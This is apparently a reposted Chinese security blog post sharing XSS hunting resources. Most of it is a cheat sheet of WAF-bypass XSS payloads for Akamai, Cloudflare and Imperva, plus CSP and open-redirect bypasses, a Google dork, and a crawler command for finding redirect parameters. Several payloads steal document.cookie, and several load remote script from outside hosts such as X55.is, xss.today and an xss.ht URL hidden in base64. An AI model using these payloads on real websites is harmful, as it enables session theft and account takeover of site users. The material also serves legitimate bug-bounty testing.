XSS挖掘工具资源分享

admin 2024年5月17日18:52:47评论19 views字数 9852阅读32分50秒阅读模式

XSS

  1. 测试不同编码方式并检查是否存在任何奇怪的行为
    1. <"'`--!>
    2. 如果反应为&lt %3c --> 测试双重编码
    3. https://github.com/InfoSecOne/ghettoBypass
    4. https://github.com/masatokinugawa/filterbypass/wiki/Browser%27s-XSS-Filter-Bypass-Cheat-Sheet
  2. 逆向工程开发者的思维
  3. XSS挖掘工具资源分享

CSP

  • CSP审查工具
1. %3C/script%20%3E 
2. mitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E
3. “><img src onerror=document.body.appendChild(Object.assign(document.createElement('script'),{src:'https:'.concat(String.fromCharCode(47)).concat(String.fromCharCode(47)).concat('externaljshere')}));>
4.

Waf

Akamai JSi 
';k='e'%0Atop['al'+k+'rt'](1)//
'"><A HRef=" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>

CloudFlare HTMLi
<Img Src=OnXSS OnError=alert(1)>
<Img Src=OnXSS OnError=confirm(document.cookie)>

Imperva HTMLi
<Img Src=//X55.is OnLoad%0C=import(Src)>

XSS挖掘工具资源分享

工具和资源

  • cheat-sheet
  • Dom-xss-burp

Referer xss

  • window.history.replaceState() 替换历史来替换referer
  • https://webhook.site/
  • CRLF
<body>
<a
href="https://www.marksandspencer.com.tr/cerez-politikasi?1111"
referrerpolicy="unsafe-url"
>

click me
</a>
<script>
window.history.replaceState(null,"","1.html")
</script>
</body>

Url跳转

重定向过程中会

深度利用

  1. windows.location: 寻找xss
  2. 后端判定:寻找ssrf

bypass

/xxx.com
//xxx.com
\xxx.com
//xxx.com
//[email protected]
//xxx.com
https://xxx.com%2Fdomain.com
https://xxx.com%2523.domain.com
https://xxx.com?c=.domain.com (#  也可以)
//%2F/xxx.com
////xxx.com
https://domain.computer/
https://domain.com.xxx.com
/%0D/xxx.com(%09 , %00, %0a, %07, %2F)
/%5Cxxx.com
//google%E3%80%82com


& ? # /  

google dork

inurl:url= | inurl:return= | inurl:return_url= | inurl:rUrl=| inurl:r_url= | inurl:next= | inurl:cancelUrl= | inurl:goto= | inurl:follow= | inurl:returnTo= | inurl:history= | inurl:redirect= | inurl:redirectTo= | inurl:redirectUrl= | inurl:goback= | inurl:redir= | inurl:redirUrl= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example.com

gospider

gospider -w -r -a -s https://wwww.xxx.com  | grep -E "callback|%2F|redirect|url=|return|rurl|r_url|next|cancelUrl|goto|follow|returnto|history|goback|redir=|ret=|r2=|page=|jump=|target="

Waf xss payload

"><img/src/onerror=import('//domain/')>"@yourdomain
013371337;ext=<img/src/onerror=import('//domain/')>

<Svg Only=1 OnLoad=confirm(document.domain)>
<Svg/OnLoad=alert(1337)>"@gmail.com
<Svg Only=1 OnLoad=confirm(atob("
Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
<svg onload=alert&#0000000040document.cookie)>
<svg onload=alert&#0000000040"
1")><””>
<Img Src=//X55.is OnLoad%0C=import(Src)>
%3csvg/onload=window%5b"
al"+"ert"%5d`1337`%3e
%3Csvg%20onload=alert(%22MrHex88%22)%3E
%3Cimg%20src=x%20onerror=alert(%22MrHex88%22)%3E
"
><svg onmouseover="confirm&#0000000040document.domain)
<Img Src=OnXSS OnError=confirm(1337)>
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
javascript:var a="
ale";var b="rt";var c="()";decodeURI("<button popovertarget=x>Click me</button><hvita onbeforetoggle="+a+b+c+" popover id=x>Hvita</hvita>")
<a/href="
javascript:Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">ClickMe
<Script>window.valueOf=alert;window%2B1</Script>
<svg/onload=location=location.hash.substr(1)>#javascript:alert(1)


"
><form onformdata%3Dwindow.confirm(cookie)><button>XSS here<!--
1%22onfocus=%27alert%28document.cookie%29%27%20autofocus=
1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=
"><𝘀𝘃𝗴+𝗼𝗻𝗹𝗼𝗮𝗱=𝗰𝗼𝗻𝗳𝗶𝗿𝗺(𝗰𝗼𝗼𝗸𝗶𝗲)> 
- 1'"
();<test><ScRiPt >window.alert("XSS_WAF_BYPASS")
'"><img src=x onerror=alert("xss!")>.pdf


"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'
block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<sVG/oNLY%3d1/**/On+ONloaD%3dcou006efirm%26%23x28%3b%26%23x29%3b>
&#34;&gt;&lt;track/onerror=&#x27;confirm%601%60&#x27;&gt;
"><track/onerror='
confirm`1`'>
%3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2Fxss.today%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E
<vIdeO><sourCe onerror="['
alu0065'+'rt'][0]['x63onstructor']['x63onstructor']('return this')()[['alu0065'+'rt'][0]]([String.fromCharCode(8238)+[!+[]+!+[]]+[![]+[]][+[]]])">
<video><source onerror="alert.constructor.constructor('
return this')().alert('0f')">
<a href="#" id="uniqueLink">Click me</a> <script> (function() { var a = ['
x6Fx70x65x6E', 'x77x72x69x74x65', 'x63x6Cx6Fx73x65', 'x70x72x69x6Ex74', 'x61x6Cx65x72x74']; var b = ['@', 'h', 'x', 'l', 'x', 'm', 'j']; var c = ['B', '1', 'P', '4', '$', '$']; document.getElementById('uniqueLink').onclick = function() { var w = window[a[0]](); w.document[a[1]](b.join('')); w.document[a[2]](); w[a[3]](); window[a[4]](c.join('')); }; })(); </script>
<sCrIpT>(function(){var a=[97,108,101,114,116];var
b=String.fromCharCode.apply(null,a);var c=[88,115,112,108,111,105,116];var d=String.fromCharCode.apply(null,c);window[b](d);})()</sCrIpT>
<DiV sTylE="WidTH:100&#37;;HeIgHt:100vH&#59;" oNpOINteROvEr="var _0x1abc=['
x63','x6F','x6E','x73','x74','x72','x75','x63','x74','x6F','x72'];var _0x2bcd=['x61','x6C','x65','x72','x74','x28','x64','x6F','x63','x75','x6D','x65','x6E','x74','x2E','x64','x6F','x6D','x61','x69','x6E','x29'];[][_0x1abc.join('')][_0x1abc.join('')](_0x2bcd.join(''))((97^0)===97?1:0);"></dIV>
<div style="width:100%;height:100vh;" onpointerover="[][decodeURIComponent('
%63%6F%6E%73%74%72%75%63%74%6F%72')][decodeURIComponent('%63%6F%6E%73%74%72%75%63%74%6F%72')](decodeURIComponent('%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29'))()"> </div>
<div onpointerover="ja&#x76;ascr&#x69;pt:eva&#x6C;(decodeURICompo&#110;ent(String.fromCharCode(97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 100, 111, 109, 97, 105, 110, 41)))" style="width:100%;height:100vh;"></div>
<div onpointerover="javascript:alert(document.domain)" style="width:100%;height:100vh;"></div>
<svg onload=(function(){let arr=[41,49,40,116,114,101,108,97].reverse().map(e=>String.fromCharCode(e));let func=new Function(...arr);func();})()>
<svg onload="alert(1)"></svg>
jaVasCript:/*-/*`/*`/*'
/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%252f%252a*/(/*%252f%252a*/*&#x252f;&#x252a;prompt(1)&#x252f;&#x253b;/**/;eval(atob('YWxlcnQoIkhpISIp'))//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%252f%252a*/)//
<select><noembed></select><script x='a@b'a> y='a@b'//a@b%0au0061lert('CYBERTIX')</script x>


<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

<BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")>
"'`><x3Cimg src=xxx:x onerror=javascript:alert(1)>
<math><x xlink:href=javascript:confirm`1`>click
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
<svg onload=alert&#0000000040document.cookie)>
JavaScript://%250Aalert?.(1)//
'/*'/*"
/*"/*`/*`/*%26apos;)/*<!-->
</Title/</Style/</Script/</textArea/</iFrame/</noScript>
74k<K/contentEditable/autoFocus/OnFocus=
/*${/*/
;{/**/(alert)(1)}//><Base/Href=//google.com76-->
<detalhes%0Aopen%0AonToGgle%0A=%0Aabc=(cou006efirm);abc%28%60xss%60%26%230000000000000000041//
xss'"><iframe srcdoc='%26lt;script>;alert(1)%26lt;/script>'>
javascript:%ef%bb%bfalert(XSS)
<input accesskey=X onclick="self['
wind'+'ow']['one'+'rror']=alert;throw 1337;">
<svg onload="[]['
146151154164145162']['143157156163164162165143164157162'] ('141154145162164506151')()">
"><video><source onerror=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYXlkaW5ueXVudXMueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61;>
&#34;&gt;&lt;track/onerror=&#x27;confirm%601%60&#x27;&gt;
<svg><use href="data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoMSkiIC8+Cjwvc3ZnPg==hashtag#x" /></svg>
"`'
><script>xE2x80x87javascript:alert(1)</script>
<img/src=x onError="`${x}`;alert(`Hello`);">
"`'><script>xE2x80x87javascript:alert(1)</script>
"
%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
"/><img%20s+src+c=x%20on+onerror+%20="alert(1)">
&#34;&gt;&lt;track/onerror=&#x27;confirm%601%60&#x27;&gt;


<svg/onload=location=‘javas’%2B‘cript:’%2B
‘ale’%2B‘rt’%2Blocation.hash.substr(1)>#(1)

<svg/onload=location=/javas/.source%2B/cript:/.source%2B
/ale/.source%2B/rt/.source%2Blocation.hash.substr(1)>#(1)

"
'`//><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE"))>
"%2Bself[%2F*foo*%2F'
alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
<SCRIPT>location=%27javasCript:alertx281x29%27</SCRIPT>
'
;k='e'%0Atop['al'+k+'rt'](1)//
"';k='e'%0Atop['al'+k+'rt'](1)//"
<Img Src=//X55.is OnLoad%0C=import(Src)>
<img/src/onerror=alert/1337/(1)>
<img/src/onerror=alert//&NewLine;(2)>
<img/src/onerror=alert&sol;&sol;(3)>
'"/><script%20>alert(document.domain)<%2fscript>.css
<iframe srcdoc="<img src=x onerror=alert(999)>"></iframe>
/path?next=javascript:top[/al/.source+/ert/.source](document.cookie)
login?redirectUrl=javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
<details%0Aopen%0AonToGgle%0A=%0Aabc=(cou006efirm);abc(VulneravelXSS%26%2300000000000000000041//

原文始发于微信公众号(白安全组):XSS挖掘工具资源分享

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月17日18:52:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   XSS挖掘工具资源分享https://cn-sec.com/archives/2749504.html

发表评论

匿名网友 填写信息